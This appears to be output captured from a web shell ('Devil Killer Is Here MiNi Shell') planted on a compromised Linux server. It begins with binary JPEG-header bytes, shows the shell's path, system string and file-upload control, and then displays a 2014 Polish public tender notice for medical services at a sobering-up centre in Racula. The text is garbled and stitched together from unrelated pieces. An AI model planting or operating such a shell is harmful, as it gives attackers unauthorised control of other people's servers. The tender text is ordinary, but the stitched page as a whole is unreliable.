JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140207/44648-N-2014.html

<p class="kh_header"><b>Racula: Świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi (CPV:  85.12.10.00-3) z podziałem na zadania  - liczba zadań  3.</b><br>
<b>Numer ogłoszenia: 44648 - 2014; data zamieszczenia: 07.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Wytrzeźwień , ul. Rodła 6, 66-004 Racula, woj. lubuskie, tel. 068 3214900, faks 068 3214001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iw.bipzielonagora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi (CPV:  85.12.10.00-3) z podziałem na zadania  - liczba zadań  3..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.	Opis przedmiotu zamówienia:
3.1. Przedmiotem zamówienia jest świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi 
        z podziałem na zadania - liczba zadań 3.

        3.1.1. Zadanie nr 1 - świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi-  zakres 
     przedmiotu zamówienia obejmuje:

 -    sprawowanie całodobowego nadzoru lekarskiego nad osobami przebywającymi w izbie wytrzeźwień,
-     prowadzenie badań lekarskich osób doprowadzonych do izby wytrzeźwień,
-     udzielanie pomocy doraźnej, która może być stosowana w izbie wytrzeźwień,
-    stwierdzenie stanu nietrzeźwości uzasadniającego zatrzymanie w izbie wytrzeźwień oraz stwierdzenie 
      braku przeciwwskazań do umieszczenia w izbie wytrzeźwień,
-     wykonanie zabiegów higieniczno-sanitarnych, uwzględniając objawy stanu nietrzeźwości,
-     kierowanie do szpitala lub innego  zakładu opieki zdrowotnej pacjentów izby wytrzeźwień, po 
      stwierdzeniu takiej konieczności,
-     w przypadku stwierdzenia lub podejrzenia u osoby doprowadzonej do izby  wystąpienia istotnych 
      zakłóceń funkcji zdrowotnych organizmu, natychmiast powiadamia się pogotowie lub zespół ratownictwa 
       medycznego
-    sprawdzanie stanu zdrowia i zachowania pacjentów izby wytrzeźwień i przeprowadzanie w tym celu 
     obchodu, 
-    wydawanie zleceń odnośnie stosowania  przymusu bezpośredniego  w razie potrzeby w stosunku do 
     osób, które  działają na szkodę zdrowia i życia lub zachowaniem swym utrudniają personelowi izby 
      wytrzeźwień  wykonanie tych czynności oraz kontrola stanu  zdrowia  osoby , w stosunku do której 
      zastosowano przymus bezpośredni ,
-    przeprowadzanie badań lekarskich osób zwalnianych z izby wytrzeźwień na zasadach objętych 
     przepisami,
-   prowadzenie rozmów profilaktyczno-terapeutycznych z pacjentami opuszczającymi izbę;
-   prowadzenie niezbędnej dokumentacji lekarskiej,
-   sporządzanie raportów z przebiegu dyżurów, z uwzględnieniem ilości zużytych leków oraz innych istotnych 
    okoliczności,
-   wykonywanie innych czynności lekarskich przynależnych izbie wytrzeźwień,
-   określenie niezbędnych ilości środków farmaceutycznych, leków oraz sprzętu medycznego niezbędnych 
    do prawidłowej obsługi pacjentów izby wytrzeźwień będzie ustalane wspólnie z zamawiającym,
-   przestrzeganie terminów ważności leków, środków oraz wyrobów medycznych zgodnie z rozporządzeniem 
    Ministra Zdrowia w sprawie trybu doprowadzenia, przyjmowania i zwalniania osób w stanie nietrzeźwości 
    oraz organizacji izb wytrzeźwień i placówek utworzonych przez jednostkę samorządu terytorialnego z dnia 
    4 lutego 2004 r. (Dz. U. Nr 20, poz. 192 z późn. zm.),
3.1.1.1. Przewidywana ilość godzin usług medycznych wynosi:
-   w dni robocze  640 godzin;
-   w soboty, niedziele, pozostałe dni świąteczne 228 godzin;
-   w wybrane  dni świąteczne 12 godzin tj.  - Wielkanoc - 1 dzień (12 godz.),
   Szczegółowy wykaz  godzin usług medycznych  z podziałem na miesiące  zawiera  tabela - załącznik 
   Nr 8.1.  do SIWZ. 
3.1.1.2..Wykonawca będzie  świadczył usługi wynikające z niniejszej umowy w systemie dyżurowym.
3.1.1.3.Harmonogram dyżurów (grafik dyżurów) określa Dyrektor Izby Wytrzeźwień w Raculi lub osoba przez
            niego upoważniona.

       3.1.2. Zadanie nr 2 -  świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi-  zakres przedmiotu   zamówienia obejmuje:

 -    sprawowanie całodobowego nadzoru lekarskiego nad osobami przebywającymi w izbie wytrzeźwień,
-     prowadzenie badań lekarskich osób doprowadzonych do izby wytrzeźwień,
-     udzielanie pomocy doraźnej, która może być stosowana w izbie wytrzeźwień,
-    stwierdzenie stanu nietrzeźwości uzasadniającego zatrzymanie w izbie wytrzeźwień oraz stwierdzenie 
      braku przeciwwskazań do umieszczenia w izbie wytrzeźwień,
-     wykonanie zabiegów higieniczno-sanitarnych, uwzględniając objawy stanu nietrzeźwości,
-     kierowanie do szpitala lub innego  zakładu opieki zdrowotnej pacjentów izby wytrzeźwień, po 
      stwierdzeniu takiej konieczności,
-     w przypadku stwierdzenia lub podejrzenia u osoby doprowadzonej do izby  wystąpienia istotnych 
      zakłóceń funkcji zdrowotnych organizmu, natychmiast powiadamia się pogotowie lub zespół ratownictwa 
       medycznego
-    sprawdzanie stanu zdrowia i zachowania pacjentów izby wytrzeźwień i przeprowadzanie w tym celu 
     obchodu, 
-    wydawanie zleceń odnośnie stosowania  przymusu bezpośredniego  w razie potrzeby w stosunku do 
     osób, które  działają na szkodę zdrowia i życia lub zachowaniem swym utrudniają personelowi izby 
      wytrzeźwień  wykonanie tych czynności oraz kontrola stanu  zdrowia  osoby, w stosunku do której 
      zastosowano przymus bezpośredni ,
-    przeprowadzanie badań lekarskich osób zwalnianych z izby wytrzeźwień na zasadach objętych 
     przepisami,
-   prowadzenie rozmów profilaktyczno-terapeutycznych z pacjentami opuszczającymi izbę;
-   prowadzenie niezbędnej dokumentacji lekarskiej,
-   sporządzanie raportów z przebiegu dyżurów, z uwzględnieniem ilości zużytych leków oraz innych istotnych 
    okoliczności,
-   wykonywanie innych czynności lekarskich przynależnych izbie wytrzeźwień,
-   określenie niezbędnych ilości środków farmaceutycznych, leków oraz sprzętu medycznego niezbędnych 
    do prawidłowej obsługi pacjentów izby wytrzeźwień będzie ustalane wspólnie z zamawiającym,
-   przestrzeganie terminów ważności leków, środków oraz wyrobów medycznych zgodnie z rozporządzeniem 
    Ministra Zdrowia w sprawie trybu doprowadzenia, przyjmowania i zwalniania osób w stanie nietrzeźwości 
    oraz organizacji izb wytrzeźwień i placówek utworzonych przez jednostkę samorządu terytorialnego z dnia 
    4 lutego 2004 r. (Dz. U. Nr 20, poz. 192 z późn. zm.),
3.1.2.1. Przewidywana ilość godzin usług medycznych wynosi:
-    w dni robocze - 480 godzin; 
-    w soboty, niedziele i święta - 228 godzin; 
-    w wybrane  dni świąteczne  - 24 godziny tj. Wielkanoc - 1 dzień (12 godz.), 25 grudnia - Boże Narodzenie  
     -  1 dzień  (12 godz.) 
    Szczegółowy wykaz  godzin usług medycznych  z podziałem na miesiące  zawiera  tabela- załącznik 
   Nr 8.2.  do SIWZ. 
3.1.2.2..Wykonawca będzie  świadczył usługi wynikające z niniejszej umowy w systemie dyżurowym.
3.1.2.3.Harmonogram dyżurów (grafik dyżurów) określa Dyrektor Izby Wytrzeźwień w Raculi lub osoba przez
             niego upoważniona.

       3.1.3. Zadanie nr 3 -  świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi -  zakres    przedmiotu zamówienia obejmuje:

 -  sprawowanie całodobowego nadzoru lekarskiego nad osobami przebywającymi w izbie wytrzeźwień,
- prowadzenie badań lekarskich osób doprowadzonych do izby wytrzeźwień,
- udzielanie pomocy doraźnej, która może być stosowana w izbie wytrzeźwień,
-    stwierdzenie stanu nietrzeźwości uzasadniającego zatrzymanie w izbie wytrzeźwień oraz stwierdzenie 
      braku przeciwwskazań do umieszczenia w izbie wytrzeźwień,
- wykonanie zabiegów higieniczno-sanitarnych, uwzględniając objawy stanu nietrzeźwości,
-  kierowanie do szpitala lub innego  zakładu opieki zdrowotnej pacjentów izby wytrzeźwień, po 
      stwierdzeniu takiej konieczności,
-   w przypadku stwierdzenia lub podejrzenia u osoby doprowadzonej do izby  wystąpienia istotnych 
      zakłóceń funkcji zdrowotnych organizmu, natychmiast powiadamia się pogotowie lub zespół ratownictwa 
       medycznego;
-   sprawdzanie stanu zdrowia i zachowania pacjentów izby wytrzeźwień i przeprowadzanie w tym celu 
     obchodu, 
-   wydawanie zleceń odnośnie stosowania  przymusu bezpośredniego  w razie potrzeby w stosunku do 
     osób, które  działają na szkodę zdrowia i życia lub zachowaniem swym utrudniają personelowi izby 
      wytrzeźwień  wykonanie tych czynności oraz kontrola stanu  zdrowia  osoby , w stosunku do której 
      zastosowano przymus bezpośredni;
-  przeprowadzanie badań lekarskich osób zwalnianych z izby wytrzeźwień na zasadach objętych 
     przepisami;
-  prowadzenie rozmów profilaktyczno-terapeutycznych z pacjentami opuszczającymi izbę;
-    prowadzenie niezbędnej dokumentacji lekarskiej;
-   sporządzanie raportów z przebiegu dyżurów, z uwzględnieniem ilości zużytych leków oraz innych istotnych 
    okoliczności;
-   wykonywanie innych czynności lekarskich przynależnych izbie Wytrzeźwień;
-  określenie niezbędnych ilości środków farmaceutycznych, leków oraz sprzętu medycznego niezbędnych 
    do prawidłowej obsługi pacjentów izby wytrzeźwień będzie ustalane wspólnie z zamawiającym,
-   przestrzeganie terminów ważności leków, środków oraz wyrobów medycznych zgodnie z rozporządzeniem 
    Ministra Zdrowia w sprawie trybu doprowadzenia, przyjmowania i zwalniania osób w stanie nietrzeźwości 
    oraz organizacji izb wytrzeźwień i placówek utworzonych przez jednostkę samorządu terytorialnego z dnia 
    4 lutego 2004 r. (Dz. U. Nr 20, poz. 192 z późn. zm.),
3.1.3.1. Przewidywana ilość godzin usług medycznych wynosi:
-     w dni robocze -  320 godzin; 
-     w soboty, niedziele, pozostałe święta - 230 godzin;
-    w wybrane dni świąteczne - 12 godzin tj. 25 grudnia (Boże Narodzenie) 1 dzień (12 godz.).
   Szczegółowy wykaz  godzin usług medycznych  z podziałem na miesiące  zawiera  tabela- załącznik 
   Nr 8.3.  do SIWZ. 
3.1.3.2.Wykonawca będzie  świadczył usługi wynikające z niniejszej umowy w systemie dyżurowym.
3.1.3.3.Harmonogram dyżurów (grafik dyżurów) określa Dyrektor Izby Wytrzeźwień w Raculi lub osoba przez
      niego upoważniona.
3.2. Oznaczenie  przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 
         85.12.10.00-3 - usługi medyczne;
3.3. Zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 23 grudnia 2013 r. w sprawie średniego
         kursu złotego w stosunku do euro stanowiącego podstawę przeliczania wartości zamówień publicznych
        (Dz. U. z 2013 r., poz. 1692) średni kurs złotego w stosunku do euro stanowiący podstawę
         przeliczania wartości  zamówień publicznych wynosi 4,2249 zł..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający 
 uzna, gdy Wykonawca:

1)     zadanie nr 1 
  a) wykaże dysponowanie co najmniej 1 osobą tj. lekarzem lub felczerem zdolnym do wykonania 
        zamówienia posiadającym kwalifikacje i uprawnienia niezbędne do wykonania zamówienia zgodnie z  
        § 5 Ustawy  z dnia 5 grudnia 1996 r. o zawodach lekarza i lekarza dentysty (tekst jednolity Dz. U. z 2011
        nr 277 poz. 1634 ze zmianami).
    b)   wskaże podstawę do dysponowania tą osobą,
    c) oświadczy, że wykazane osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają           
       wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
       Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób 
       i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i   
        oświadczenia wg zasady spełnia / nie spełnia.          
  2)     zadanie nr 2 
      a) wykaże dysponowanie co najmniej 1 osobą tj. lekarzem lub felczerem zdolnym do wykonania 
        zamówienia posiadającym kwalifikacje i uprawnienia niezbędne do wykonania zamówienia zgodnie z  
        § 5 Ustawy  z dnia 5 grudnia 1996 r. o zawodach lekarza i lekarza dentysty (tekst jednolity Dz. U. z 2011
        nr 277 poz. 1634 ze zmianami).
    b)   wskaże podstawę do dysponowania tą osobą,
    c) oświadczy, że wykazane osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają           
       wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
       Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób 
       i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i   
        oświadczenia wg zasady spełnia / nie spełnia.          
  3)     zadanie nr 3 
      a) wykaże dysponowanie co najmniej 1 osobą tj. lekarzem lub felczerem zdolnym do wykonania 
        zamówienia posiadającym kwalifikacje i uprawnienia niezbędne do wykonania zamówienia zgodnie z  
        § 5 Ustawy  z dnia 5 grudnia 1996 r. o zawodach lekarza i lekarza dentysty (tekst jednolity Dz. U. z 2011
        nr 277 poz. 1634 ze zmianami).
    b)   wskaże podstawę do dysponowania tą osobą,
    c) oświadczy, że wykazane osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają           
       wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
       Sprawdzenie w/w warunku udziału w postępowaniu odbywać się będzie na podstawie wykazu osób 
       i przedłożonych przez Wykonawcę informacji o podstawie do dysponowania tymi zasobami i   
        oświadczenia wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony  i podpisany formularz  oferty wg załącznika Nr 1 do SIWZ;
2)   dokument , z którego wynika upoważnienie osoby/osób do podpisania oferty w imieniu Wykonawcy lub 
       pełnomocnictwo do reprezentowania Wykonawcy składa się w formie oryginału lub kopii poświadczonej          przez notariusza, o ile nie wynika to z innych dokumentów załączonych do   oferty przez Wykonawcę;
3)    W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w myśl art.23 ustawy
        pzp, należy dostarczyć :
-      pełnomocnictwo do reprezentowania wszystkich Wykonawców. Pełnomocnik może być ustanowiony do        reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia        umowy w sprawie przedmiotowego zamówienia. Zamawiający dopuszcza  złożenie przedmiotowego       dokumentu w formie oryginału   lub kopii poświadczonej przez notariusza,
-    dokumenty składane w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust.1       ustawy pzp, dotyczące  Wykonawców wspólnie ubiegających się o udzielenie zamówienia winien        złożyć   każdy z Wykonawców wspólnie ubiegających się o zamówienie,
-      informację o przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5 ustawy       pzp składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
4)  Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce       zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie dotyczącym dokumentów       podmiotów zagranicznych, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także  osoby uprawnione do reprezentacji Wykonawcy, złożone   przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio  kraju miejsca zamieszkania osoby lub kraju, w którym  Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed  upływem  terminu składania ofert.
5)    W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub   
miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do
właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma  siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących 
przedłożonego dokumentu.
6)  W przypadku podmiotów wspólnie ubiegających się o udzielenie o udzielenie zamówienia oraz w       przypadku innych podmiotów, na zasobach, których Wykonawca polega na zasadach określonych w 
 art. 26 ust.2b ustawy pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
7)   Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do
wykonania zamówienia lub zdolnościach finansowych (jeśli dotyczy) innych podmiotów, niezależnie od 
 charakteru prawnego łączącego go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest
udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów  (oryginał) do oddania mu do 
 dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany dopuszczalne w zakresie przewidzianym w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.iw.bipzielonagora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego w pokoju nr 1, ul. Rodła 6, 66-004 Racula..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2014 godzina 10:00, miejsce: siedziba Zamawiającego, ul. Rodła 6, 66-004 Racula, pokój nr 1..</p>
